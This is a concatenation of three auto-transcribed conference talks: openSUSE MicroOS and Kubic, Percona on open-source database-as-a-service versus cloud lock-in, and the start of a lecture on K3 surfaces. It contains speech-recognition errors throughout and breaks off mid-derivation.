to be in sync with each other. You know, even though Kubernetes runs its container, even though Kubernetes is running its container control plane in containers, you know, they're still dependent on the container runtime below that and the cubelit below that. So, you know, when you suddenly have a situation where you want to update the control plane, you still have to worry about making sure the base operating system is updated and actually in the right order because if you update the wrong thing at the wrong time, you can't then update the control plane. So with Cubic, we've kind of taken micro s and tuned it with the goal of being sort of the perfect Kubernetes operating system. It's fully integrated with the upstream QBADM way of deploying clusters, commonly uses CRIO with its container runtime. The whole update mechanism is tied in fully integrated with CURT, the Kubernetes reboot daemon. So transactional update can update the nodes, tell CURT, you know, this node is ready for a reboot and then the cluster decides, okay, this node, the family of nodes can be rebooted and, you know, the service is moved away from the mix, etc. And we also have a tool called Cuba control, which basically is a very fancy wrapper around QBADM. Now, just to streamline a few things if you don't want to do things to that sort of upstream QBADM way. I've been thinking lately, especially after the acquisition of Rancher by SUSE, is things like, you know, is Cubic, as we see it right now, actually the perfect Kubernetes operating system? I mean, it's certified by the CNCF and it's a perfectly good example. But could we go even better? And I kind of asked myself this question of, you know, if Kubernetes has its containerized control plane and Kubernetes knows when it needs to update that and Kubernetes knows what the patch level of the nodes are, why can't we create a version of microS, which basically becomes a slave to the Kubernetes cluster entirely. So actually designed in a way of instead of having transactional update patching itself, probably even moving like the entire transactional update stack, as we know it now, from the microS image, they're not having any package management native on the system at all. Doing the entire thing as BTIFS send and receives from some sort of centrally curated root sub-voting images. So I have sort of the cluster nodes, okay, this is my golden image. This is the image that I want to have on my nodes. And then using the BTIFS send and receive features to just update all of the nodes with the perfect BTIFS clone of that sub-voting. Potentially you could even distribute that clone as via containers and then actually have the containers run effectively in equivalent to the transactional update process I've already talked about. So you still have sub-volumes, you still have snapshots, you still have the ability to roll everything back, but you wouldn't have any actually binaries on the machine doing it. You just have, you know, you contain it deployed and unpack itself in essence. And potentially with BTIFS and it's kind of nice complicated B-tree arrangement, you could find a way, and I've got a proof of concept that kind of works. I'm like using BTIFS checksums to verify the entire node root FS. So once one of these upgrades has happened, every node could be checked to make sure that they've all got exactly the same version of exactly same everything with not a single binary or metadata change across the entire root file system. None of this is certain or solid yet. This is kind of brainstorming, but if you have any thoughts or ideas on this, please reach out to me because this is kind of a really interesting take on the whole micro-res thing. I think I can see it really sort of taking cubic in its own direction if it works, the way it does in my head at least. Another side project of the regular micro-res is actually the micro-res desktop where the team asks themselves, you know, what if that one job for micro-res, you know, isn't running containers or isn't running some IoT service, but instead was running a desktop. Like the Chrome-res example talked about earlier. We have working micro-res images now where we basically have a small, tiny base system and then just the desktop environment, in this case both KDE and GNOME, and the absolute sort of minimum configuration tools, you know, a terminal, a package manager, etc. And then everything else, the browsers, the applications, all the user space stuff is being provided by FlatPacks from FlatUp, which seems to be a really perfect place for this. You know, upstreams are packaging all of that stuff there. Why is a distribution do we have to package everything again if everything is already there curated nicely and nicely sandboxed and easy for us to bolt onto in our own way? Micro-res desktop isn't for everybody. You know, if you already like tumbleweed and LEAP, don't worry, they're safe. I still use tumbleweed myself, although I can see myself moving away from it in time, because I am a lazy developer and I think this model is actually perfectly suited for those lazy developers who don't want to tinker with their own machine anymore. They just want the desktop to just work. And especially if they mostly develop around containers like I am more and more, I don't really need to mess around with the operating system, even when I want to get down and dirty with what I'm working on, I can just throw that in a container. So I might as well have a read-only root file system and a read-only desktop in essence and just have the applications being provided by containers of some kind. Beyond the lazy developer use case, it should also apply like talked about your typical Chromebook or iOS or Android user, where they're used to having an operating system that is very, very static, that updates itself has automated updates, has automatic rollbacks. And the thing they care about is the apps in the app store. Now, we've got tools for handling apps like an app store now. So I can see things coming down that road rather nicely. So the goal of the micro-s desktop is a little bit different from the rest of micro-s. It's still going to be reliable, predictable and immutable, just like micro-s. It's definitely going to be less customizable than your traditional tumbleweed or leap installation, even with contributors. We really welcome contributors to this project, don't get me wrong. But there are times when some new contributor swoops in and says, oh, add this and this and this to the micro-s desktop. And I'm like, yeah, do we need any of that stuff? Really? We don't necessarily need to have all the bells and whistles, tumbleweed and leap take care of that. We want to have a less customizable and more curated experience for those users. And as part of that, it should be small, but not necessarily small at the cost of functionality. So things like printing, gaming, media production, all need to be there and work. They quite often have drivers or subsystems, things like cups need to be installed. So we're not just going to say no for the sake of saying no to keep it small, but at the same time, we only want to make sure that if we're adding something, it's kind of in the attempt to solve this problem that micro-s desktop is trying to solve. And the whole experience should work really nicely out of the box. Judging the micro-s desktop as it stands today, we've got those images. They're reliable. They're predictable. They're mutable just like the rest of micro-s. It's definitely less customizable than the regular tumbleweed and leap. It's small. And yeah, it's actually almost this almost should be a tick box actually, but yeah, it's small, but sometimes a little bit too small at the moment. There are some functionality for things like gaming drivers or multimedia. They don't quite as smooth out of the box as I'd like. And generally speaking, micro-s desktop isn't as smooth out of the box as we would like it to be. We really would like more people to help us look at it, figure out the packages and the likes that are missing. We've sort of trimmed it so tight that it's sometimes a little bit too small now and just help us kind of get that configuration done. So things just work right out of the box. One example of that is things like when packages are missing, where would the best place be to actually pull the fix from? If we have it packaged in open SUSE, our tendency has typically been, okay, we'll just pull it from the typical tumbleweed repository and we're done. But if we're starting to get to the point now where flat pack has some of this functionality, some of these packages already packaged up, and we kind of like the idea of the micro-s desktop pulling flat packs by default, but I have to be honest, which is I'm mentioning it across them. I don't actually know how to install those flat packs by default. So if anybody has any ideas or suggestions, please reach out to me. Let me know because I love that kind of, I think, will be the sort of last bit to really get the micro-s desktop out of alpha and into sort of beta and regular usage for everybody. If you'd like to reach out to contribute to us, the micro-s project will kind of originally spawn. There's a sub-product out of cubic. It's kind of funny now, so cubic is a sub-project, but yeah, so the best mailing list to reach finders all in is the open-susa-cubic mailing list or cubic on IRC on FreeNode. Or if you just want to submit something, you know, you can basically send anything to factory and, you know, we'll probably find it at some point. Or if you don't already have a develop project in the open-susa process, then going to the cubic develop project is where we will take open-susa build service or crass, help curate it before we get it into the main distributions. And with that, I am done, so if there's any questions, please fire away and I'll do my best to answer them. Thank you very much.
|
An overview and discussion regarding the openSUSE Project's latest rolling-release distribution, MicroOS. The session will detail how concerns regarding the stability of rolling releases are addressed by narrowing the scope of OS, and using technologies like (Atomic) Transactional Updates and automated health checking to guarantee the system keeps working. The session will cover how MicroOS is developed, and the broad range of suitable use cases, from Container server workloads, to Raspberry Pi's and Desktops including real-world examples from the community.
|
10.5446/53623 (DOI)
|
Hey everyone, today we'll talk about public, about database as a service and how is it right for open source and disruption. But before we get to that, I wanted to talk about why am I speaking about the database on a service in the distribution dev room to begin with. When I think about distributions, I think these are what we do with a complex system which contains multiple components which must work well together and in this way provide a lot more value than second apples components separately. Think about Linux distributions for example, where you could potentially take a kernel GLIP-C bunch of utilities, compile that all together and use it, but that was not really very convenient or practical. So most people were using their distributions to begin with. As the time went, we also got distributions for things like OpenStack or more recently for Kubernetes. In the database space, the distribution is not as common of a name. But if you think about what MySQL Enterprise is or MariaDB Enterprise is, it is really a distribution which includes the core components such as a database server as well as a bunch of tools and utilities to help you with high availability, security, monitoring and other tasks you need to really have a database running successfully. From the corner side, we also have a bunch of database distributions which we actually named distributions. We have distributions for MySQL, for MongoDB and for Cosgres SQL at this point. By the way, all of our distributions unlike MariaDB and MySQL, they are 100% open source. We don't have any property components. And exception is MongoDB of course, the server has to be provided under SSPL license, which is not quite open source, but we don't have a choice of this matter. If you think about the database as a service, what really is it? I think this is really the design, this main concept of distribution, these are components which are well tested, integrated and work together and make it available in a modern way through API. So you're not installing the packages, but you are just making a call and then you have a database cluster available for you. You make another call and it's upgraded to the new version and stuff like that. When it comes to the databases, I believe the database as a service has won because it really offers you unparalleled experience of using the database, but at the same time, it currently comes with a software vendor lock-in and as we all know, their software vendor lock-in sucks. And what happens in such cases, of course, is what open source is coming into the rescue. But before I talk more about those topics, let me take you back a little bit at the early days of the modern open stores. Myself, I got involved in open source in the late 90s, which is now a long time ago. And what you had to do at that time is you would download the sources, then you will make sure what those work appropriately in your particular environment, maybe have to apply some patches for that, come on, and so on and so forth. And from that point on, we had the process of simplification that's, you know, Darjezeep, binaries, packages, repositories, you know, Docker and Snap packages. And what you can see here is we have this never-ending move towards simplicity. In a database as a service, it is obviously a state of art of simplicity when it comes to the databases, open source nodes. So we have a trend where things are becoming easier and easier. Barrier to entry is reduced. And that is actually pretty cool, right? Because if you think about the modern open source, many developers, which are doing a lot of contribution to open source database, open source ecosystem, database or not, they wouldn't be able to build from scratch all the tools they use. Right? I think majority just use prepared, compiled tools for what they need and just focus on the problems, what they solve. And I think that really allows us to use and produce more complicated, more valuable software. And much more developers can be open source developers, right? You don't have to be the expert in C and bash as in early open source days. You can be just doing open source development in JavaScript or Python. Now with that though, comes a bit of a dark side. If you look at the next round of simplification after all those kind of simple packages, comes with vendor lock-in, which happens in the cloud. Now here is an interesting picture I dig out, which is from explain the cloud at the times when the cloud was not really well understood. And guess what? The cloud computing was compared to electricity. And it kind of makes sense, right? It's not reasonable for you to think now about having your own generator, right? Because you live in some very special circumstances, right? You can get electricity from there a bunch of providers, right? Some of them may be cheaper, are more reliable, yet others may be more green. But at the same time, it is all very much replaceable. It is commodity. But reality though, in the cloud is once cloud was understood, cloud vendors do not want to be commodity. They want to ensure they are not a commodity and typically would advise you to use most proprietary solution, which causes the lock-in. So if you look at the cloud, so what they recommend in the database space, which I am focusing on, you would hear a lot of them advertising things like DynamoDB, Amazon, Aurora, Google Cloud SQL, Spanner, BigQuery, stuff like that. And they wouldn't tell you, hey, guys, you know what? You can actually can run, do it yourself, open source and be successful this way. Now with all that marketing coming in, which is a lot and which can be deafening, I think you should remember what in the end in choice is yours and you can choose your clouds to what extent you want to choose the part of the server and get a lot of lock-in or part of freedom by basing your solution on a commodity cloud APIs and open source software. Going back to the database as a service. Well, currently the easiest and the fastest way to deploy open source and compatible software in the cloud, including databases, is through a proprietary API. And this is not unexpected. If you look at the open source path in the previous generations, it usually takes a lot longer to acquire usability comparable to the open source software. If you look at the late 90s, for example, it was by far easier to install something like Windows NT compared to Linux for server distribution. But open source caught up and in many cases took over the proprietary software in the convenience and usability. Anyway, going back to the databases, you have basically two choices, rolling out your own solution using commodity building blocks or use databases as a service functionality. And the database as a service really provides a lot of value. It does remove a lot of toil like managing availability, database patch in backups can include some automated performance tuning. It's maybe easy to scale, either doing that automatically or kind of as a push button away or API call. And really it gives a lot of power to developers. You do not need to have a DBA's help to permission to deploy the database or manage that. You can really choose a number of databases you want and the database which is best focused on the problem at hand. That is one of the reasons we have a huge number of special purpose databases blowing up those days because developers can just choose what they need and run it in the cloud. But at the same time, you need to understand what even if a lot of those solutions in the database space are branded as open source compatible, that is typically what I would call limited hotel California comparability. Meaning is they're designed for you to be very easy to check in to get on board of this platform, but have a hard time to leave this platform if you choose to by providing those nice value added features, which you know only or even sometimes I know only we start to lie in your application and then it would be hard to leave. So a little bit for pro advice out there, if you are choosing to use database as a server and want to make sure you can move back to the open source software of this open source compatible version, make sure your application is remains to be tested with an open source version, both from terms of functionality and in terms of performance. Otherwise, it's maybe very hard to get back that comparability once you once you lost it. And then a challenge of database as a service is what cloud vendors often like to market database as a servers as fully managed. And we have seen a lot of folks being surprised in the end what's well that fully managed that still means there is a lot of shared responsibility. Security, well, you better not do stupid mistakes or cloud vendors would not be able to protect your data or performance or ability, right? A lot of those things are really managed to a limited extent and you often still need the professionals to get that fully managed experience. And what we also have seen in a lot of cases that company when they get in in that fully managed context and they do not have a database professionals on the team can have a bad out house, right? You have probably seen over the last couple of years, there's so many information about the database leaks, data leak from there from here. And in a lot of cases, these are based on the preventable problems. It is just what the team did not have which really understand everything that goes in database security. Here is some of some of the interest and stats in this case, right? Is what you can see what there is increasing number of companies running database as a service, right? We also find, you know, few of them find that hosting being more expensive than they thought. And it is interesting what the performance is used even in that kind of fully managed environment is still considered the most significant problem for them. Another interesting thing in this case as cloud vendors are successful in getting us to use database as a service, we can see what the premium of that database as a service is really growing compared to comparable issues to environment. And that means with just a few database servers, you may be, well, talking about quite a bit of a difference, right? If you only could find to avoid those costs. So with database as a service, locking, I think while it's kind of painful now and those numbers may be not too large, especially if you just need a couple of instances, right? And you are just starting up, it is going to be more painful in the future. And here we can go to the history lesson as an example, right? This young gentleman right here and no one but Larry Ellison. And in his early days, Oracle was actually that company which was saving people from the IBM clutches, which has been getting the hardware locking the mainframe computers. Guess what? As Oracle have saved everyone, they kind of turned around and introduced lock in on their own with often unfortunate experience for their customers. So the question what we come to the fact is wouldn't it be great to get a database as a service simplicity, but as open source solution for you? And I have some bad news for you, but we are not quite there yet. But as a title of my talk says, I believe what we are ripe right now for discussion. The good news is we have now the Kubernetes, which is a pretty mainstream, right? And it's really one as an operating system for cluster rather individual hosts. It has a lot of momentum. And what is fantastic about it is support universally in public, private, and also hybrid cloud. So if you really is building your solution on Kubernetes, it can really run anywhere. Well what you can ask me about that? Well, if you are talking about it's Peter, right? You are CEO of a company called Percona and what folks are you doing about that besides telling us that there is a problem to be solved? What we do is we do build software for this modern world and we keep it open source. We have built the Percona X operators for MySQL and MongoDB and our Percona management framework that is also state of art, completely open source solution for database monitoring with management functions coming in. Now we have operators, but operators are often not enough. Operators can be wonderful and we have ours used by a lot of people who are experts in Kubernetes. But if you're just developer, it is not as simple as starting Amazon RDS in a couple of clicks. What you believe in this case is needed is database as a service experience, right? Which is similar to what Amazon RDS provides, but as an open source software. And if no vendor looking. Now again, we do not have the full solution for that yet, but we are working on that. We have an experimental CLI, for example, which allows you after you set up connection to Kubernetes to provision the databases with a pretty much single command line call. And we just released very recently the database as a service preview in PMM where you can get exactly that experience, kind of similar to what you will get with Amazon and other cloud vendors, as well as it's also available with the API calls if you would prefer that. With that, let me go back to what I started with. We can obviously see what database as a service has been worn due to the unparalleled experience of using the database, right? We all can agree what their software vendor look in so sucks. And the open source is really coming to the rescue. And I believe it will be a thing that here at O2, we will have a very credible open source database solution from Percona for sure. But I also know there are a number of other players which are working in this space. So for example, I would mention folks called Stagras. They are building also Kubernetes distribution focus on PostgreSQL and with optimization for a user experience. You can check that out as well. With that, that's all I've got at this point. I would be happy to answer some of your questions. Hello. Okay. Thanks. So we had a couple of questions and I answered them briefly, but I can also ask them more in more details while I have a couple of minutes. If you look at how do we work with cloud databases as a service while they are so simple, I think a lot of here comes from the two fronts. One is education. In my opinion, a lot of folks I talk to, they do not really understand the difference of the truly open source and so-called open source compatible databases which are offered in the cloud and then they lock in and have a downsides which can be found. That is something I think what we as open source community need to continue working on educating them about that. And then the second thing is the usability. I think because of how cloud vendors are able to integrate their offerings and their other infrastructure, it is hard to beat them in usability. But I think that's where 80-20 rules applies if you are going to get close enough to usability. So my Georgia folks are able to use that and that is going to be good enough. So from a slide standpoint, I have uploaded the slides right now. So that's one health check around simple scripts. I think that's left over article from the other sites. Well, in terms of database leaks and configuration cost, I would suggest to Google. In this case, you will find a lot of articles in terms of specific leaks. I didn't provide an example because I didn't want to put any particular data technology or even particular company on the spot. But there is a print of examples. And there is also a tool called Shoren which actually reports a number of open instances. And I think that's a great way to show really how prevalent that problem on a misconfiguration is. Right, next slide, sis? Here is a, a screen. OK. Good搞, thank you. If you have left it, I would obviously recommend aろSCF competition.
|
The database market is changing drastically in ways no one imagined 5 years ago. Database vendors are moving away from traditional deployment methods and embracing database as a service (DBaaS) as the default method to offer their database technologies to consumers and users. Much of this movement has been built because of the success and popularity of DBaaS offerings by major cloud vendors. Unfortunately, this is leading to a new era of NROSS (Not really open source) technologies that pretend to be free, open, and transparent but simply are not. As people wake up from the hangover’s caused by the incompatibilities, lack of portability, and increased costs they are looking at how to reclaim the openness, transparency, and freedom true OpenSource has provided them in the past. We will explore the trends and give his opinions and ideas on how we need to disrupt the current trends to keep open source open, and give users the freedom of having a quality alternative.
|
10.5446/53766 (DOI)
|
Okay, thank you very much to Erwan and Xavier for giving me the possibility to give this lecture here. It's really a great pleasure to be here. So I will talk about the topics on K3 surfaces. And I will give you, since this is a lecture, give you the content of the lecture. So I will start today with a short introduction about the position of K3 surfaces in the codirect classification. Then I think always today I will give you several examples of K3 surfaces. And in particular, so we will talk about, for example, complete intersection and talk about kumar surfaces. So a very nice example of K3 surfaces, also related to, well, very strictly related to a billion surfaces that you have seen this morning. I will talk then about the basic properties of K3 surfaces. So finally again some important results. For example, you will see, starting seeing how likely theory plays an important role when you work with K3. And we will at least formulate the subjectivity of the peer map and Torelli theorem, that are two very big theorems for K3. And then I will, this will be maybe today and tomorrow. And then we will start studying automorphisms, so some general facts on automorphisms. Automorphism of K3. And then I will focus, I hope, at the end of the lecture on result on symplectic automorphisms. So if times permit, I will also talk about modular spaces of K3 surfaces with automorphisms. So let's start with a brief introduction, as I say. So let's say paragraph one. So the K3 surface is a request codder classification. So for me, surface is a compact complex manifold, so in particular smooth, of dimension two. So we'll maybe talk about single K3, but in general what I'm saying always is smooth. And in this first part, I will recall something that maybe you know already. So when one wants to classify, let's say surfaces, but this is not only for surfaces, one can do it for more in general. So an important tool to do that is a codirer dimension. It's a codirer dimension. So let's recall briefly what it is. And well, first before to do that, I will say that a surface is projective, so I will work most of the time in the projective setting. If not, I will tell you. So as a surface is projective, if there is an embedding, again, you have seen this morning for Torai, an embedding S in some projective space Pn, and as I said at the beginning, I'm here working always on the complex number. So we want now then to problem. So classify projective surfaces. So what does it mean classify a projective surface? Well, this go back to a request of Casteluovo around 9010. They give a birational classification of surfaces, of surfaces. In fact, so when you classify curves, you classify them up to isomorphism. But when you start work with these surfaces, there's some new phenomena appearing, which is something called blow up. So let's say, maybe, birational classification, this means, if you're calling just for the notation, F from, so this means that S are equivalent as prime if there is F from S to S prime a birational map. And as I say, an example of a birational map that makes why one wants to classify up to birational isomorphism, birational map is blow up. New phenomena that explains why one wants to classify up to, as I say, birational map is the blow up. And this doesn't happen, of course, so it does not make sense to talk about that. So blow up, you know, you have your surface S from one side. You make the blow up, essentially, you'll plus the point when you do the blow up by what is called a minus 1 curve. Let's say E, so this means that E squared is equal to minus 1, and this is blow up. And then so we will always consider in this lecture, so I will, and E is the morphin 2 1, sorry, forgot that. So in this lecture, I will always assume that we don't have surfaces like this, so that one get after blow up, but we always consider S minimal. Always S minimal, E, S does not contain E. E is the P1, E squared equal to minus 1. Talking about minimal surfaces, so I did a lot of transformation. If a surface contains this minus 1 curve, you can blow down to smooth point and then consider these smooth surfaces. How to describe now the Codire dimension? So just for notation, so I will denote by KS, the canonical divisor on S, so I will always denote by S as surface. So if I change notation, I will tell you. So KS, the canonical divisor. So I will denote out this morning by omega 2 S, the vector bundle of holomorphic 2 form on S, which is the same as the shift associated to KS. And then I can consider global sections. So consider now global sections, global section, so H0, we'll know that this S, oh yes, KS. So I will switch often the rotation from the shift to the vector bundle, so depending on what I'm talking about. Transaction and even more, consider global section of twist of Z, S tensor n to some power for n in n. This is also the same of OS n times the canonical divisor. And then when you have a section, take a basis, you can define a rational map. So one can define, so let's say S1, Sn, or S0, Sn, the basis. And one get a rational map, let's say phi nKS, so this is a, if I projectivize this, this is a linear system associated to nKS, that are the affected divisor equivalent to this. And so I have a map from S to some projective space, so let's say Pn, even by this section. And then we can define what is the Cotyder dimension, we call the definition. So this is, if you want P of a 0S OS nKS, and one should put, let's say, a dual here. So the definition then, which is the Codyder dimension of S, of S. And you take the maximum of dimension of this image, so the maximum over n, so this is integer, of image phi nKS of S, maybe you take the closure, since you're just rational, sorry, dimension. That's, thank you, max over n of the dimension of this, and this is kappa x, kappa s, sorry. And while you have immediately some fact, so this Codyder dimension cannot exceed the dimension of S, so you can not only define for surfaces, but you can define it for varieties in general. So kappa s, so let's say maybe I'll remark, kappa s is, let's say, 0, 1, and 2. And if you have no section at all, so I just write the map, of course, you can have in this space nothing at all, so just here, just the 0, it's a vector space. And so this gives you nothing, so let's put minus infinity. And so when you classify surfaces, you can then classify them by using the Codyder dimension, and so studying what happened with the Codyder dimension is minus infinity, 0, or 1, or 2. So minus infinity, as I say, means that this, that is empty, which you want. Let's recall what happened for Codyder dimension minus infinity 1 and 2. So our favorite case will be the Codyder dimension 0. So if the Codyder dimension is minus infinity, so recall the classification. So we have a first case, so kappa s is equal to minus infinity. So these are, you think about the projective space, for example, it satisfies exactly this condition. And in fact, these are the surfaces that are rational, it's called rational surfaces. So this means that the rational 2p2, for example, all the blow-up of p2, for example, you get the del petto surface here, plus let me just separate the two, even if one can put all here, rolled surfaces. So I decided to separate two just to make maybe, to put some accent on the case of p2. So this means that you have a birational map from s to c times p1, where c is a curve, genus of c is bigger equal than 0. So let me put this case too. Of course, if you are here and you allow genus equal to 0, so any surface that is here is also here. So this is not a joint description somehow. But I just wanted to point out these two different situations. So this depends also on the geometric genus of the surface. But anyhow, so here, you have probably out of example in mind. Let's go now to Codare dimension 0, which is, as I said, our favorite case. So I will just say something very quickly and then something more in detail. Of course, you will let the lecture. So Codare dimension 0. Okay. So this means the image is a point. So this is a point. And here you have four kinds of surfaces that you're going to have. So one you have seen already this morning. So let's say Abelian surfaces. Okay. Yeah, yeah, here I'm just in the projective setting. Yeah, yeah, yeah, yeah. Not go outside. So Abelian surfaces. So these are C2 model of lambda with lambda around four lattice. And well, we have seen this morning, but anyhow, so not every tori is projective. So again, a difference with the Riemann surfaces and curves. So that's why I say Abelian surfaces, considering it's with some embedding in Pn. Okay. Then you have K3 surfaces. I will not say anything about that now because we have all the lecture to talk about that. Then you have a request surfaces. And since one important point of our lecture will be automorphism, these are exactly, are the quotient of K3 surfaces by fixed point free involutions. Can we all describe that way? So I hope to talk about, I will not talk about any surfaces, but this fixed point free evolution a little bit when talking about automorphism. And then you have the B-eliptic surfaces. That's how I relate it now to Abelian surfaces, our quotient of that surfaces. That are quotient, let's say, a product of two elliptic curves. Let's say just these are quotient of products E times E prime, where E and E prime are elliptic curves, are finite quotients. So one take, well, these are all classified. So that's in Van der De Frankis. I think 1987. So these are classified. For example, how does it look such a quotient? So you have a finite group acting on one curve that acts on translation on the other one. And then you take the quotient here must be P1. And then you take the quotient, give you some kind of B-elipid surface. And that's all for codile dimension 0. Let's go now to codile dimension 1, just very fast. So in this case, Ks equal to 1. So the image is a curve. And these are called proper elliptic curves, surfaces, Ks equal to 1. These are proper elliptic surfaces. So as I said, this is sent to a curve. And so the special fact about proper elliptic surfaces is that they always have an elliptic vibration. So without going too much into the details, they always have an elliptic vibration. So this means you have a map to some curve and the fiber is an elliptic curve. But when you say proper elliptic, so this should be different, for example, from K3, from rational, and so on. Because while it exists, while K3 surfaces that are elliptic, not all K3 surfaces are elliptic, so not every K3 surface is an elliptic vibration. But there are K3 that have elliptic vibrations. And well, the last class, which is the huge class, is the Ks equal to 2, which are the surfaces of general type. Somehow, it's a more mysterious class. So it's where there's a lot of work on structural surfaces, general type, given PG, and irregularity, and so on. And if you look at this classification, somehow it reminds you very much what is done for curves, genus 0, genus 1, and genus 2. One can say that, or bigger equal than 2, better. One can say that curve of genus bigger equal than 2 are for general type. Genus 1 are the elliptic curve, and then genus 0 are rational, so it's P1. So this is how it looks like in higher dimension. So let's go now immediately to start talking about K3. And well, one first thing that one has to mention when talking to K3, so you have never heard about that, or very few, is why they are called K3. So let's go to K3 surfaces starting from now. So the name was given by Andre Veil in 1958, when he was writing some report on a project. So it's usually what work on a project like a report, and he was writing about this beautiful object, and this was given in honor. So I will just write in honor of the K2 mountain in Kashmir. If you look in the history, so 1958, just some year before, this mountain was climbed. So this had made a huge publicity around that, and it was kind of impressive. And Andre Veil found them so beautiful, or maybe sometimes I won't say so difficult as this mountain, that the name K3 came after this K2. So in fact, in history, there is a K3 mountain in Kashmir, but it's not so high, so that was somehow forgotten. In Kashmir, and in honor of three very famous mathematicians that are Kummer, we will see when we talk about Kummer surfaces. Kehler heard about this morning, and Kodaira, so the three Ks of K3. So this is why this is how strange name of K3 surface. The most easy example of K3 surface is maybe the following. I will give you an example, and maybe let's think about the properties of this example that will bring you to the notion of K3, of the definition of K3. So which is very easy example when you study K3, the first one should have in mind. Most easy example. Take the Fermat-Quartik surface, which is the zero set x0 to the power 4, x1 to the power 4, x2 to the power 4, x3 to the power 4 equal to zero in P3. This is a very symmetric surface with, for example, very nice geometric properties, contained for example a lot of lines. And one remark immediately that it is moves. The partial derivative, let's say this is a 4, a 4 have no common difference from zero. So that's what any time I will talk about K3 again is smooth. So I will have, use polynomial, this kind of conditions. And we observe the following two properties of this surface. So first of all, let's talk about the, consider the canonical divisor. So to compute it, let's consider a junction. If you take a junction, well, what is the canonical class of that surface is Kx4. A junction, I will tell you, is a canonical class of P3 plus x4 restricted to x4. Well let's look at that. So the canonical class of P3 is minus 4 times h. h is a class of an hyperplane section. And x4 is 4 times an hyperplane, linear equivalent to that. So immediately see this is trivial. So they say that this is 0. So we have a Kx4 is trivial. And second property, we want to stay, so the Q of s, which is h1 of s, which is called the irregularity. You know, when one classifies surfaces, for example, in that case, one can always give in two bi-rational invariants that are the irregularity, which is h1 of s or h0 omega 1 s, if you remember in the lecture this morning, global 1-4. And the geometric genus, which is h0 of omega 2s, we'll talk about in a minute, how to compute the regularity. Well, I will maybe say something that is a bit more than just computing Q. We've used the left-hand theorem. I will say something more than that. Even say that k-thi-sophies are simply connected. This theorem on hyperplanes section tells you that the fundamental group of x, Q1, x4, is the same of the fundamental group of b3, which is trivial. So in particular, so x4 is simply connected. So this tells us that, let's say in that way, that so the rank of P1 of x4 take the ablianized of the group, does not very much matter. This is the h1 of the homology. But then this is also the dimension over c of c. So this means then I can try now everything over c and consider homology. Tell me that the h1 of x4c is equal to 0. So they tell us that h1 of 0 is equal to h1 of xc, which is by Hodge-de-Composite position, the h01 plus h10. This is h1 of s. Sorry, it is an s, of course. x4 even. Sorry, x4 everywhere. So this is x4 and this is h0 omega 1 x4. Here everything is projective, so scalar. So the two-dimensional are equal. So that's just telling me that this one of this one of the two is 0. So the regularity of x4 is equal to 0. So there are different ways to show that. You can always also consider an exact sequence involving the regular function x4, regular function p3, and so on. I did it that way because you see already something that some properties more that we will see very soon for any k3 surface. So this tells you that the regularity is 0 and maybe we'll remark again on the canonical divisor on canonical divisor. So this is on a hyper surface so you can write down easily how the canonical divisor looks like. So in the chart, let's say x1 different from 0, or let's say xi different from 0, df, dsj different from 0, one can write the two form corresponding to the global section as the k3. Let's say writing this way, dxh, dxk, df, dxj, where all the indices here, h, k, j, and i are different. This gives you a global form which is never 0, giving you zeros or poles. So this tells you somehow that even something more that you have a global two-former that is never 0. We'll never degenerate. So if we are resuming the property that we are talking about, so resuming kx for kx is trivial and the irregularity is also trivial. So we can now give now the definition of a k3 surface by using these two properties of x4. So s, a compact, complex surface. So again, for me, everything is smooth. It's k3 if ks is trivial and the regularity of s is equal to 0. So one can find equivalent definitions of that because you say when I was talking about x4, even you were showing that x4 is simply connected and then it was showing that the regularity is 0. So this is one implication is trivial somehow. The other implication is not so trivial because if you have that 0, you cannot see that it is simply connected. You have to kill the torsion to say that there is no torsion. So that needs a bit more of work but somehow not so much. So some remarks. So here I am in the complex setting. So that's why here when I give the definition, sorry, just go for a moment back into the not projective setting, k3 surfaces are not all projective. So here most of the time I will consider projective k3 but not all k3 are projective. Even one say that the generic k3 is not projective but they are all killer. Which is however very good properties. And well, one easy way to construct non-projective k3 surfaces, just start with Torai. You will see you do all the kumar construction that we are going to do. Then you get something, a k3 which is kumar, so which is not necessarily projective. Then another property as I said, so let me just write it down. One can show that the fact the irregularity, so this h0 omega 1s, this side dimension, so as usual, the small h denotes the dimension. I did not write that because it's standard notation. One can show that the irregularity 0 is equivalent to simply connected. Okay, as I said one implication is what actually is actually what I did above. So this implies this, but from here to here one has to kill torsion. We will not prove this now but we will see a very similar computation where we will show that the second chronology with integer coefficient of a k3 is a lattice. So that you will see somehow how to go from here to here. And yes, and since I was talking about the geometric genus, for sk3, the geometric genus, which is a PG, which is h0 omega 2s is equal to 1. Just to complete if you look in the classification of surfaces. Okay, so these are remarks about that. And what we are going to do next before to give general properties, I want to give you more examples. I think examples are always important to have in mind than to understand what happened more in general. I will leave some of them as an exercise because there are some computations that are very similar of what I was doing for quartics. So the next, let's say very geometric examples are complete intersections. So let's go to the second section talking about complete intersections, so examples of k3. So complete intersection. Well we have seen first, well let me just include here as complete intersection, quartics in p3. So smooth quartics in p3 are all k3. Not only the fermat but any, we can do actually do a similar computation. You take any in the sense I take a generic one, so I don't want a singular one. Then you take s23, I call it this way, a complete intersection of a quadric and a cubic in p4. Again I want this complete intersection, so it means they meet transversally, so it's smooth in p4. This is k3 again. And s2222, again complete intersection of three quadrics in p5. And this I leave you on Wednesday as an exercise to show that these are k3. Let's say we are an exercise. Well if you want the first part to show that the irregularity is zero, well the proof is again left-shed, you use left-shed to show the simply connectedness and then the irregularity is zero. And you use many types of adjunctions and to show that the canonical divisor is trivial. And these are all the complete intersections. If you start going to higher pn, you can always find a k3 surface in any pn, but this is no more complete intersection. Okay, so then you get k3 in Grasmagnian and so on. But there are more nice examples of k3 that I want to talk about, which are the double planes. And then we will go to Kumar. So the k3 double plane, so we'll do the computation to see that it is really k3. So double plane. Double plane, so we take s, double cover of p2. So this is 2 to 1, which is ramified on asmoot sexy curves. So we'll put here, let's say c6. And we want to see that it is a k3. So let's show that the canonical class is trivial and that the irregularity is zero. So we want to show that s is k3. Then we compute the canonical divisor. So I give a name to this map, which is pi. We'll use the property of double covers. So this is the pullback of the canonical divisor of p2 plus the ramification. Okay, so the ramification is here. So we have r is such that, so r is on s, such that p of r is equal to c6. And we have that pullback of c6 with the help of this 2 to 1 map is 2 times the ramification. Okay, so the 2 times come from the fact that you get 2 to 1 map. So from this formula, you get the 2 times canonical divisor is equal to pullback of 2 times kp2 plus 2 times r. And this is, and we like that because 2 times r is the pullback of c6. But well, now remind that kp2 is equal to minus 3l. l is the class of a line. And c6, and c6 is 6 times the line. So if you look at here, so you have the pullback of that. So this is pullback of 2 times, so minus 6l plus pullback of 6l. So this tells you that is 0. Okay, so 2 times, we get that 2 